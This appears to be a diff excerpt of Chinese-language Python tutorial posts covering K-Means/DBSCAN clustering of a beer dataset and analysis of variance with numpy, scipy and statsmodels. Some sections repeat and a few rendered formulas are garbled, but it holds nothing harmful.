    8 Miller_Lite 99 10 4.3 0.43 0 0 0
    19 Schlitz_Light 97 7 4.2 0.47 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 1 1 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 1 1 1
    5 Old_Milwaukee 145 23 4.6 0.28 1 1 1
    10 Coors 140 18 4.6 0.44 1 1 1
    1 Schlitz 151 19 4.9 0.43 1 1 1
    16 Hamms 139 19 4.4 0.43 1 1 1
    17 Heilemans_Old_Style 144 24 4.9 0.43 1 1 1
    6 Augsberger 175 24 5.5 0.40 1 1 1
    0 Budweiser 144 15 4.7 0.43 1 1 1
    4 Heineken 152 11 5.0 0.77 1 1 2
    3 Kronenbourg 170 7 5.2 0.73 1 1 2
    13 Becks 150 19 4.7 0.76 1 1 2
    14 Kirin 149 6 5.0 0.79 1 1 2
    1
    2
    # 通过每一簇的平均值, 来观察聚类结果的特征
    beer.groupby('scaled_cluster').mean()
    calories sodium alcohol cost cluster2 cluster3
    scaled_cluster
    0 105.375 10.875 3.3250 0.4475 0.25 0.75
    1 148.375 21.125 4.7875 0.4075 1.00 1.00
    2 155.250 10.750 4.9750 0.7625 1.00 1.00
    1
    scatter_matrix(X, c=colors[beer.scaled_cluster], alpha=1, figsize=(10, 10), s=100)
    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

    得出结论: 对数据的标准化操作, 不一定会使数据的聚类结果更加有效

    6 聚类结果评估

    1
    2
    3
    4
    5
    # 计算轮廓系数
    from sklearn import metrics
    score_scaled = metrics.silhouette_score(X, beer.scaled_cluster)
    score = metrics.silhouette_score(X, beer.cluster3)
    score_scaled, score
    (0.1797806808940007, 0.6731775046455796)

    未标准化的数据反而有更大的轮廓系数更精确的聚类结果

    这说明, 数据集在聚类过程中, 某些数据列具有更高的权值, 这可能是数据本身的要求

    7 通过轮廓系数来确定 K-Means 聚类参数

    1
    2
    3
    4
    5
    6
    7
    # 在 2~20 持续变化 K 值, 对同一数据进行 K-Means 聚类, 并计算轮廓系数
    scores = []
    for k in range(2, 20):
    labels = KMeans(n_clusters=k).fit(X).labels_
    score = metrics.silhouette_score(X, labels)
    scores.append(score)
    scores
    [0.6917656034079486, 0.6731775046455796, 0.5857040721127795, 0.422548733517202, 0.4559182167013377, 0.43776116697963124, 0.38946337473125997, 0.39746405172426014, 0.3915697409245163, 0.3413109618039333, 0.3459775237127248, 0.31221439248428434, 0.30707782144770296, 0.31834561839139497, 0.2849514001174898, 0.23498077333071996, 0.1588091017496281, 0.08423051380151177]

    随着 K 值的增加, 轮廓系数系数不断变小, 聚类效果变差

    1
    2
    3
    plt.plot(list(range(2, 20)), scores)
    plt.xlabel('Number of Clusters Initialized')
    plt.ylabel('Sihouette Score')
    Text(0, 0.5, 'Sihouette Score')

    png

    8 DBSCAN 聚类

    1
    2
    3
    4
    5
    6
    from sklearn.cluster import DBSCAN

    db = DBSCAN(eps=10, min_samples=2).fit(X)
    labels = db.labels_
    beer['cluster_db'] = labels
    beer.sort_values('cluster_db')
    name calories sodium alcohol cost cluster2 cluster3 cluster_db
    9 Budweiser_Light 113 8 3.7 0.40 1 1 -1
    3 Kronenbourg 170 7 5.2 0.73 0 0 -1
    6 Augsberger 175 24 5.5 0.40 0 0 -1
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0 0
    16 Hamms 139 19 4.4 0.43 0 0 0
    14 Kirin 149 6 5.0 0.79 0 0 0
    13 Becks 150 19 4.7 0.76 0 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0 0
    10 Coors 140 18 4.6 0.44 0 0 0
    0 Budweiser 144 15 4.7 0.43 0 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0 0
    4 Heineken 152 11 5.0 0.77 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0 0
    1 Schlitz 151 19 4.9 0.43 0 0 0
    8 Miller_Lite 99 10 4.3 0.43 1 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1 1
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2 2
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2 2

    -1 表示噪声点, 其他表示分类点, 与 K-Means 的聚类结果基本相符

    1
    beer.groupby('cluster_db').mean()
    calories sodium alcohol cost cluster2 cluster3
    cluster_db
    -1 152.666667 13.000000 4.800000 0.510000 0.333333 0.333333
    0 146.250000 17.250000 4.383333 0.513333 0.000000 0.000000
    1 99.333333 10.666667 4.200000 0.453333 1.000000 1.000000
    2 70.000000 10.500000 2.600000 0.420000 1.000000 2.000000
    1
    scatter_matrix(X, c=colors[beer.cluster_db], alpha=1, figsize=(10, 10), s=100)
    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

    ]]>
    @@ -9942,7 +9942,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8015/ - 正文

    15 方差分析

    15.1 方差分析概述

    通过对实验数据进行分析, 检验方差相同的多个正态总体均值是否相等

    实例: 为了对几个行业的服务质量进行评价, 消费者协会在 4 个行业中分别抽取了不同的企业作为样本.最近一年中消费者总共对 23 家企业投诉的次数如下表所示

    import numpy as np
    import pandas as pd

    data = np.array([[57, 68, 31, 44],
    [66, 39, 49, 51],
    [49, 29, 21, 65],
    [40, 45, 34, 77],
    [34, 56, 40, 58],
    [53, 51, None, None],
    [44, None, None, None]])
    df = pd.DataFrame(data, index=range(1, 8), columns=["零售业", "旅游业", "航空业", "家电制造业"])
    df.index.name = "观测值"
    df
    零售业 旅游业 航空业 家电制造业
    观测值
    1 57 68 31 44
    2 66 39 49 51
    3 49 29 21 65
    4 40 45 34 77
    5 34 56 40 58
    6 53 51 None None
    7 44 None None None
    import matplotlib.pyplot as plt

    # 解决中文显示问题
    plt.rcParams['font.sans-serif']=['SimHei']
    plt.rcParams['axes.unicode_minus'] = False

    plt.figure()
    for i in range(data.shape[1]):
    plt.scatter(i * np.ones(data.shape[0]), data.T[i])
    plt.xticks(range(data.shape[1]), ('零售业', '旅游业', '航空业', '家电制造业'))
    plt.ylabel('被投诉次数') # 设置坐标轴名称
    plt.xlabel('行业')
    plt.show()

    png

    从散点图中可以看出, 不同行业被投诉的次数的均值是有差异的, 但这种差异也可能是由抽样的随机性造成的, 需要有更准确的方法来检验这种差异是否显著

    15.2 方差的比较

    • 组内方差: 某一因素的同一水平(同一个总体)下样本数据的方差, 例如, 零售业被投诉次数的方差. 组内方差只包含随机误差

    • 组间方差: 某一因素的不同水平(不同总体)下个样本之间的方差, 例如, 4 个行业被投诉次数之间的方差. 组间方差既包含随机误差, 也包含系统误差

    如果不同行业对投诉次数没有影响, 则组间误差中包含随机误差, 没有系统误差, 此时组件误差与组内误差经过平均后的数值很接近, 它们的比值会接近于 1

    如果不同行业对投诉次数有影响, 在组间误差中除包含随机误差之外, 会包含系统误差, 此时它们的比值会大于 1

    15.3 方差分析

    15.3.1 单因素方差分析

    与方差分析相关的统计量:

    1 水平(总体)的均值

    $$\bar X_i=\frac{1}{n_i}\Sigma^{n_i}{j=1}X{ij}, i=1,…,k$$

    X_bar = []
    for i in range(data.shape[1]):
    X_bar.append(data.T[i][data.T[i] != np.array(None)].mean())
    X_bar
    [49.0, 48.0, 35.0, 59.0]
    2 全部观察值的总均值

    全部观察值$X_ij$的总和 除以 观察值的个数

    $$\bar{\bar{X}}=\frac{1}{n}\Sigmak_{i=1}\Sigma{n_i}{j=1}X{ij}=\frac{1}{n}\Sigma^k_{i=1}n_i\bar{X_i}$$

    X_bar_bar = data.T[data.T != np.array(None)].mean()  # 不知道咋念...
    X_bar_bar
    47.869565217391305
    3 总离差平方和(SST)

    样本全部观察值$X_{ij}$与总平均值$\bar{\bar X}$的离差平方和, 反映全部观察值的离散情况.

    $$SST=\Sigmak_{i=1}\Sigma{n_i}{j=1}(X{ij}- \bar{\bar X})^2$$

    SST = ((data.T[data.T != np.array(None)] - X_bar_bar) ** 2).sum()
    SST
    4164.608695652174
    4 水平项平方和(SSA)

    各个水平$A_i$下样本均值$\bar X_i$与样本总平均$\bar{\bar X}$的偏差平方和, 它在一定程度上反映了各总体均值$\mu_j$之间的差异引起的波动, 又称组间平方和, 该平方和既包括随机误差, 也包括系统误差

    $$SSA=\Sigmak_{i=1}\Sigma{n_i}{j=1}(\bar X_i-\bar{\bar X})2=\Sigmak{i=1}n_i(\bar X_i-\bar{\bar X})^2$$

    SSA = 0
    for i in range(data.shape[1]):
    SSA += len(data.T[i][data.T[i] != np.array(None)]) *\
    (data.T[i][data.T[i] != np.array(None)].mean() - X_bar_bar) ** 2
    SSA
    1456.608695652174
    5 误差项平方和(SSE)

    在各个总体$A_i$下, 样本数据$X_{ij}$与其总体均值$\bar X_i$的偏差平方和反映了抽样的随机性引起的样本数据$X_{ij}$的波动, 又称组内平方和, 该平方和反映的是随机误差的大小

    $$SSE=\Sigmak_{i=1}\Sigma{n_i}{j=1}(X{ij}-\bar{X_i})^2$$

    SSE = 0
    for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
    SSE += (j - X_bar[i]) ** 2
    SSE
    2708.0
    6 总离差平方和的分解

    $$SST=SSE+SSA$$

    7 各自由度

    $SST$的自由度为$n-1$, 其中$n$为全部观察值的个数

    误差项离差平方和($SSE$)的自由度为$k-1$, 其中$k$为因素水平(总体)的个数

    水平项离差平方和($SSA$)的自由度为$n-k$

    8 各误差的均方差 MSA 和 MSE

    组间方差$SSA$的均方差记为$MSA$

    组内方差$SSE$的均方差记为$MSE$

    计算方法是用误差平方 除以 相应的自由度

    设置检验统计量

    $$F=\frac{SSA/(k-1)}{SSE/(n-k)}=\frac{MSA}{MSE}F(k-1, n-k)$$

    k = len(data[1])
    n = len(data[data!= np.array(None)])
    F = (SSA / (k - 1)) / (SSE / (n - k))
    F
    3.4066426904716036

    上述分析的结果可排成表格的形式, 称为单因素实验方差分析表:

    方差来源 误差平方和 自由度 均方差 F 值
    组间 SSA k-1 MSA MSA/MSE
    组内 SSE n-k MSE
    总和 SST=SSE+SSA n-1

    15.3.2 方差分析中的多重比较

    为了进一步了解因素 A 的各个总体对观测变量的具体影响效果

    多重比较检验就是通过对各个总体观测变量均值的逐对比较, 来进一步检验到底哪些均值之间存在差异, 并找出最优水平.

    如果原假设$H_0:\mu_i=\mu_j,i,j=1,2,…,r,i\ne j$成立, 检验统计量应较小, 因此拒绝域为$|\bar X_i-\bar X_j|>t_{\alpha/2}\sqrt{MSE(\frac{1}{n
    _i}+\frac{1}{n_j})}$

    如果满足拒绝域条件, 则认为$\mu_i$与$\mu_j$有显著性差异, 否则认为它们之间没有显著性差异

    例 15.2
    import pandas as pd
    import numpy as np

    data = np.array([[26.5, 31.2, 27.9, 30.8],
    [28.7, 28.3, 25.1, 29.6],
    [25.1, 30.8, 28.5, 32.4],
    [29.1, 27.9, 24.2, 31.7],
    [27.2, 29.6, 26.5, 32.8]])
    df = pd.DataFrame(data, index=range(1, 6), columns=["无色", "粉色", "橘黄色", "绿色"])
    df.index.name = "样本"
    df
    无色 粉色 橘黄色 绿色
    样本
    1 26.5 31.2 27.9 30.8
    2 28.7 28.3 25.1 29.6
    3 25.1 30.8 28.5 32.4
    4 29.1 27.9 24.2 31.7
    5 27.2 29.6 26.5 32.8
    X_bar = []
    for i in data.T:
    X_bar.append(np.round(i.mean(), 2))
    X_bar
    [27.32, 29.56, 26.44, 31.46]
    SSE = 0
    for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
    SSE += (j - X_bar[i]) ** 2
    SSE
    39.083999999999975
    n = data.size
    k = data.shape[1]
    MSE = SSE / (n - k)
    MSE
    2.4427499999999984

    令显著性水平$\alpha=0.05,t_{\alpha/2}(16)=2.12,n_i=n_j=5,i,j=1,2,3,4,5$

    $t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}=2.096$

    from scipy.stats import t

    alpha = 0.05
    t_alpha_div_2 = t.ppf(1 - alpha / 2, (n - k))
    t_alpha_div_2
    2.1199052992210112
    np.round(t_alpha_div_2 * np.sqrt(MSE * (1 / data.shape[0] + 1 / data.shape[0])), 3)
    2.095
    for i in range(len(X_bar) - 1):
    for j in range(i + 1, len(X_bar)):
    print("|\\bar X_{} - \\bar X_{}| ={})".format(i + 1, j + 1, np.round(np.abs(X_bar[i]-X_bar[j]), 2)))
    |\bar X_1 - \bar X_2| =2.24)|\bar X_1 - \bar X_3| =0.88)|\bar X_1 - \bar X_4| =4.14)|\bar X_2 - \bar X_3| =3.12)|\bar X_2 - \bar X_4| =1.9)|\bar X_3 - \bar X_4| =5.02)

    依据上面结果可得出相应的影响效果,

    如$|\bar X_1 - \bar X_2|>2.095$, 则说明$X_1$和$X_2$有显著性差异, 也就是说明无色和粉色对产品销售的影响有显著性差异

    $|\bar X_2 - \bar X_4|<2.095$, 说明$X_2$和$X_4$没有显著性差异, 也就是说粉色和绿色对产品销售的影响没有显著性差异

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$
    $F_B=\frac{MSB}{MSE}$$\left[r-1,rs(m-1)\right]$
    $F_{AB}=\frac{MSAB}{MSE}$$\left[(r-1)(s-1),rs(m-1)\right]$

    m 为试验次数($\ge2$)

    例 15.3

    有$s=4$个品牌的彩电在$r=5$个地区销售, 为分析品牌和地区对销售量是否有影响, 每个品牌在各个地区的销售量如下, 试分析品牌和地区对销售量是否有显著影响?$(\alpha=0.05)$

    import numpy as np
    import pandas as pd

    data = np.array([[365, 350, 343, 340, 323],
    [345, 368, 363, 330, 333],
    [358, 323, 353, 343, 308],
    [288, 280, 298, 260, 298]])
    df = pd.DataFrame(data, columns=["B1", "B2", "B3", "B4", "B5"],
    index=["A1", "A2", "A3", "A4"])
    df.index.name = "品牌销售表(因素 A)"
    df.columns.name = "销售地区(因素 B)"
    df
    销售地区(因素 B) B1 B2 B3 B4 B5
    品牌销售表(因素 A)
    A1 365 350 343 340 323
    A2 345 368 363 330 333
    A3 358 323 353 343 308
    A4 288 280 298 260 298

    $SST=3652+3502+…+2982-\frac{65692}{20}=17888.95$

    SST = (data ** 2).sum() - data.sum() ** 2 / data.size
    SST
    17888.950000000186

    $SSA=\frac{1}{5}(17212+17392+…+14242)-\frac{65692}{20}=13004.55$

    SSA = 0
    for i in data:
    SSA += i.sum() ** 2
    SSA /= data.shape[1]
    SSA -= data.sum() ** 2 / data.size
    SSA
    13004.55000000028

    $SSB=\frac{1}{4}(13562+13212+…+12622)-\frac{65692}{20}=2011.7$

    SSB = 0
    for i in data.T:
    SSB += i.sum() ** 2
    SSB /= data.shape[0]
    SSB -= data.sum() ** 2 / data.size
    SSB
    2011.7000000001863

    $SSE=SST-SSA-SSB=2872.7$

    SSE = SST - SSA - SSB
    SSE
    2872.6999999997206
    差异源平方和自由度均方F 值
    品牌(因素 A)SSA = 13004.55s - 1 = 3MSA = SSA / (s - 1) = 4334.85MSA / MSE = 18.10777
    地区(因素 B)SSB = 2011.7r - 1 = 4MSB = SSB / (r - 1) = 502.925MSB / MSE = 2.100846
    误差SSE = 2872.7(r - 1)(s - 1) = 12MSE = SSE / (rs(m - 1)) = 239.3917
    总和SST = SSA + SSB + SSE = 17888.95rsm - 1 = 19
    • 由于$F_A=18.108>F_{0.95}(3, 12)=3.49$, 说明彩电的品牌对销售量有显著影响

    • 由于$F_B=2.101<F_{0.95}(4, 12)=3.26$, 说明销售地区对彩电的销售没有显著影响

    15.4 综合实例——连锁餐饮用户评级分析

    15.4.1 单因素方差实例分析

    某连锁餐饮在 3 个城市用户评分资料如表所示,已知各城市用户评分的分布近似与正态等方差,是以 95%的可靠性判断城市对用户评分是否有显著影响?

    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame(np.vstack((cityA, cityB, cityC)), index=['A', 'B', 'C'])
    df.columns.name = "用户评分"
    df.index.name = "城市"
    df
    用户评分 0 1 2 3 4 5 6 7 8 9
    城市
    A 10 9 9 8 8 7 7 8 8 9
    B 10 8 9 8 7 7 7 8 9 9
    C 9 9 8 8 8 7 6 9 8 9
    方法 1 使用 scipy.stats.f_oneway()方法
    # 首先检查方差是否相等, 在使用 f_oneway 函数之前需要先检验方差齐性, 这里使用了 levene 方差齐性检验
    """
    scipy.stats.levene(*samples, center='median', proportiontocut=0.05)
    对等方差执行 Levene 检验。
    小的 p-value 表明总体没有相等的方差。
    """
    (W, p) = stats.levene(cityA, cityB, cityC)
    if p < 0.05:
    print(('Warning: the p-value of the Levene test is <0.05: p = {0}'.format(p)))
    # 单因素方差分析
    # 第一种方法
    F_statistic, pVal = stats.f_oneway(cityA, cityB, cityC)
    print('单因素方差分析结果(f_oneway): F = {0}, and p = {1}'.format(F_statistic, pVal))
    if pVal < 0.05:
    print('One of the groups is significantly different.')
    单因素方差分析结果(f_oneway): F = 0.10150375939849626, and p = 0.9038208903685354
    方法 2 利用 statsmodels 库函数中包含的 anova_lm 模型, 使用线性 OLSModel 进行方差分析
    # 单因素方差分析
    # 第二种方法 statsmodel 库函数
    # 将数据存入 dataframe 中
    df = pd.DataFrame()
    names = locals()
    for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
    # 使用线性 OLSModel 进行方差分析
    model = ols('S ~ city', df).fit()
    anovaResults = anova_lm(model)
    print('单因素方差分析结果(anova_lm):')
    print(anovaResults)
    df
    单因素方差分析结果(anova_lm):            df  sum_sq   mean_sq         F    PR(>F)city       2.0     0.2  0.100000  0.101504  0.903821Residual  27.0    26.6  0.985185       NaN       NaN
    city S
    0 A 10
    1 A 9
    2 A 9
    3 A 8
    4 A 8
    5 A 7
    6 A 7
    7 A 8
    8 A 8
    9 A 9
    10 B 10
    11 B 8
    12 B 9
    13 B 8
    14 B 7
    15 B 7
    16 B 7
    17 B 8
    18 B 9
    19 B 9
    20 C 9
    21 C 9
    22 C 8
    23 C 8
    24 C 8
    25 C 7
    26 C 6
    27 C 9
    28 C 8
    29 C 9
    3 手动计算各误差值, 实现单因素方差分析
    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame()
    names = locals()
    for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
    groups = df.groupby('city')
    # The "total sum-square" is the squared deviation from the mean
    ss_total = np.sum((df['S'] - df['S'].mean()) ** 2)
    # 计算 SSE 和 SSA
    (ss_treatments, ss_error) = (0, 0)
    for val, group in groups:
    ss_error += sum((group['S'] - group['S'].mean()) ** 2)
    ss_treatments += len(group) * (group['S'].mean() - df['S'].mean()) ** 2
    df_groups = len(groups) - 1
    df_residuals = len(df) - len(groups)
    F = (ss_treatments / df_groups) / (ss_error / df_residuals)
    df = stats.f(df_groups, df_residuals)
    p = df.sf(F)
    print(('单因素方差分析结果(手动计算): F = {0}, and p = {1}'.format(F, p)))
    单因素方差分析结果(手动计算): F = 0.1015037593984973, and p=0.9038208903685354

    由于$F<F_{0.05}(2, 27)=3.35$或$P>0.05$, 所以原假设成立, 不能认为城市对用户评分有影响

    15.4.2 多因素方差分析实例

    收集在环境等级(environment)和食材等级(ingredients)两个因素影响下的某连锁餐饮店的用户评价数据

    #影响餐饮的 2 个因素:环境等级,食材等级
    from scipy import stats
    import pandas as pd
    import numpy as np
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm
    environmental = [5,5,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,1,1,1,1,1]
    ingredients = [5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1]
    score = [5,5,4,3,2,5,4,4,3,2,4,4,3,3,2,4,3,2,2,2,3,3,3,2,1]
    data = {'E':environmental, 'I':ingredients, 'S':score} # E 表示环境, I 表示食材, S 表示分数
    df = pd.DataFrame(data)
    df
    E I S
    0 5 5 5
    1 5 4 5
    2 5 3 4
    3 5 2 3
    4 5 1 2
    5 4 5 5
    6 4 4 4
    7 4 3 4
    8 4 2 3
    9 4 1 2
    10 3 5 4
    11 3 4 4
    12 3 3 3
    13 3 2 3
    14 3 1 2
    15 2 5 4
    16 2 4 3
    17 2 3 2
    18 2 2 2
    19 2 1 2
    20 1 5 3
    21 1 4 3
    22 1 3 3
    23 1 2 2
    24 1 1 1

    利用 statsmodels 中的 anova_lm 模块进行多因素方差分析

    """
    符号意义:
    (~)隔离自变量和因变量(左边因变量, 右边自变量)
    (+)分离各个自变量
    """
    formula = 'S~E+I'
    results = anova_lm(ols(formula,df).fit() )
    print(results)
                df  sum_sq    mean_sq           F        PR(>F)E          1.0    7.22   7.220000   46.444444  7.580723e-07I          1.0   18.00  18.000000  115.789474  3.129417e-10Residual  22.0    3.42   0.155455         NaN           NaN

    由于$P 值很小$, 说明环境和食材两个因素对用户评分影响较大

    ]]>
    + 正文

    15 方差分析

    15.1 方差分析概述

    通过对实验数据进行分析, 检验方差相同的多个正态总体均值是否相等

    实例: 为了对几个行业的服务质量进行评价, 消费者协会在 4 个行业中分别抽取了不同的企业作为样本.最近一年中消费者总共对 23 家企业投诉的次数如下表所示

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import numpy as np
    import pandas as pd

    data = np.array([[57, 68, 31, 44],
    [66, 39, 49, 51],
    [49, 29, 21, 65],
    [40, 45, 34, 77],
    [34, 56, 40, 58],
    [53, 51, None, None],
    [44, None, None, None]])
    df = pd.DataFrame(data, index=range(1, 8), columns=["零售业", "旅游业", "航空业", "家电制造业"])
    df.index.name = "观测值"
    df
    零售业 旅游业 航空业 家电制造业
    观测值
    1 57 68 31 44
    2 66 39 49 51
    3 49 29 21 65
    4 40 45 34 77
    5 34 56 40 58
    6 53 51 None None
    7 44 None None None
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import matplotlib.pyplot as plt

    # 解决中文显示问题
    plt.rcParams['font.sans-serif']=['SimHei']
    plt.rcParams['axes.unicode_minus'] = False

    plt.figure()
    for i in range(data.shape[1]):
    plt.scatter(i * np.ones(data.shape[0]), data.T[i])
    plt.xticks(range(data.shape[1]), ('零售业', '旅游业', '航空业', '家电制造业'))
    plt.ylabel('被投诉次数') # 设置坐标轴名称
    plt.xlabel('行业')
    plt.show()

    png

    从散点图中可以看出, 不同行业被投诉的次数的均值是有差异的, 但这种差异也可能是由抽样的随机性造成的, 需要有更准确的方法来检验这种差异是否显著

    15.2 方差的比较

    • 组内方差: 某一因素的同一水平(同一个总体)下样本数据的方差, 例如, 零售业被投诉次数的方差. 组内方差只包含随机误差

    • 组间方差: 某一因素的不同水平(不同总体)下个样本之间的方差, 例如, 4 个行业被投诉次数之间的方差. 组间方差既包含随机误差, 也包含系统误差

    如果不同行业对投诉次数没有影响, 则组间误差中包含随机误差, 没有系统误差, 此时组件误差与组内误差经过平均后的数值很接近, 它们的比值会接近于 1

    如果不同行业对投诉次数有影响, 在组间误差中除包含随机误差之外, 会包含系统误差, 此时它们的比值会大于 1

    15.3 方差分析

    15.3.1 单因素方差分析

    与方差分析相关的统计量:

    1 水平(总体)的均值

    $$\bar X_i=\frac{1}{n_i}\Sigma^{n_i}{j=1}X{ij}, i=1,…,k$$

    1
    2
    3
    4
    X_bar = []
    for i in range(data.shape[1]):
    X_bar.append(data.T[i][data.T[i] != np.array(None)].mean())
    X_bar
    [49.0, 48.0, 35.0, 59.0]
    2 全部观察值的总均值

    全部观察值$X_ij$的总和 除以 观察值的个数

    $$\bar{\bar{X}}=\frac{1}{n}\Sigmak_{i=1}\Sigma{n_i}{j=1}X{ij}=\frac{1}{n}\Sigma^k_{i=1}n_i\bar{X_i}$$

    1
    2
    X_bar_bar = data.T[data.T != np.array(None)].mean()  # 不知道咋念...
    X_bar_bar
    47.869565217391305
    3 总离差平方和(SST)

    样本全部观察值$X_{ij}$与总平均值$\bar{\bar X}$的离差平方和, 反映全部观察值的离散情况.

    $$SST=\Sigmak_{i=1}\Sigma{n_i}{j=1}(X{ij}- \bar{\bar X})^2$$

    1
    2
    SST = ((data.T[data.T != np.array(None)] - X_bar_bar) ** 2).sum()
    SST
    4164.608695652174
    4 水平项平方和(SSA)

    各个水平$A_i$下样本均值$\bar X_i$与样本总平均$\bar{\bar X}$的偏差平方和, 它在一定程度上反映了各总体均值$\mu_j$之间的差异引起的波动, 又称组间平方和, 该平方和既包括随机误差, 也包括系统误差

    $$SSA=\Sigmak_{i=1}\Sigma{n_i}{j=1}(\bar X_i-\bar{\bar X})2=\Sigmak{i=1}n_i(\bar X_i-\bar{\bar X})^2$$

    1
    2
    3
    4
    5
    SSA = 0
    for i in range(data.shape[1]):
    SSA += len(data.T[i][data.T[i] != np.array(None)]) *\
    (data.T[i][data.T[i] != np.array(None)].mean() - X_bar_bar) ** 2
    SSA
    1456.608695652174
    5 误差项平方和(SSE)

